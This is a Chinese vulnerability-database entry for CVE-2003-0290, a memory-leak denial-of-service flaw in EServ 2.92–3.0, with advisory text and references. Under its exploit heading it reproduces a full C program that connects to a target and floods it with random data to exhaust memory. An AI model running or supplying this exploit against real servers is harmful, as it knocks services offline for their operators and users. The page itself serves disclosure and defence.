EType EServ资源耗竭远程拒绝服务攻击漏洞

EType EServ资源耗竭远程拒绝服务攻击漏洞

漏洞ID 1107316 漏洞类型 设计错误
发布时间 2003-05-11 更新时间 2005-10-20
图片[1]-EType EServ资源耗竭远程拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2003-0290
图片[2]-EType EServ资源耗竭远程拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200306-090
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22586
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-090
|漏洞详情
Eserv是一款集成Mail、News、Web、FTP和代理服务器的系统。Eserv服务程序错误的处理打开的连接,远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击。Eserv连接处理程序包含一个内存泄露问题,当接收到一个连接后,服务器会在堆中分配8到32K字节的内存,但当连接不再存在的情况下Eserv没有正确的释放连接所使用的内存,可导致内存泄露,攻击者提交超多的成功连接,使用的内存会过多,而使系统不稳定。如一般在1,000个连接之后,会泄露78MB到312MB的内存。
|漏洞EXP
source: http://www.securityfocus.com/bid/7552/info
 
A denial of service vulnerability has been reported for EServ. The vulnerability exists due to the way the server handles connections. Specifically, memory allocated for open connections are not properly freed when a connection no longer exists. This will result in a consumption of all available memory resources.
 
**It has been reported that EServ version 3.0 previously thought to be invulnerable to this issue is affected by this vulnerability. This version was tested on Windows 2000.
 
This vulnerability affects EServ 2.92 to 3.0. 

/* m00-eServ-fun.c
 *
 *  EServ/2.95-3.00 remote memory-leak exploit
 *
 *  Result: exiting program and close all services
 *  if you seen message: Broken pipe
 *  then may going drink beer 8)
 *
 *  Eserv 3.0 only web(80) services susceptible on this DoS
 *
 *  rash / m00.void.ru
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{  
  char buf[2000];
  int fd;
  struct sockaddr_in rsin;

  if (argc!=3) {
   printf("n usage: %s <ip> <port>nn", argv[0]);
   exit(0);  
  }
  
  rsin.sin_family = AF_INET;
  rsin.sin_port   = htons(atoi(argv[2]));
  rsin.sin_addr.s_addr = inet_addr(argv[1]);
 
  for (fd=0;fd<2000;fd++)
    buf[fd]=(int *)((rand()*10));
  
  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);             
  if (connect(fd,(struct sockaddr *)&rsin,sizeof(struct sockaddr))) perror("[-] connect()"),exit(0);
  printf("[+] connected..n"); 
  printf("[+] send data to host..n"); 
  
  while (1) {
   if ((send(fd, buf, 2000, 0))<0)      
     break;  
  }   
}
|参考资料

来源:BUGTRAQ
名称:20030513eServMemoryLeakSolution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105284631428187&w;=2
来源:BUGTRAQ
名称:20030511eServMemoryLeakEnablesDenialofServiceAttacks
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105284630228137&w;=2
来源:XF
名称:eserv-multiple-connections-dos(11973)
链接:http://xforce.iss.net/xforce/xfdb/11973
来源:BID
名称:7552
链接:http://www.securityfocus.com/bid/7552
来源:VULNWATCH
名称:20030511eServMemoryLeakEnablesDenialofServiceAttacks
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html

相关推荐: GNU gzexe Temporary File Vulnerability

GNU gzexe Temporary File Vulnerability 漏洞ID 1100096 漏洞类型 Unknown 发布时间 2003-06-07 更新时间 2003-06-07 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享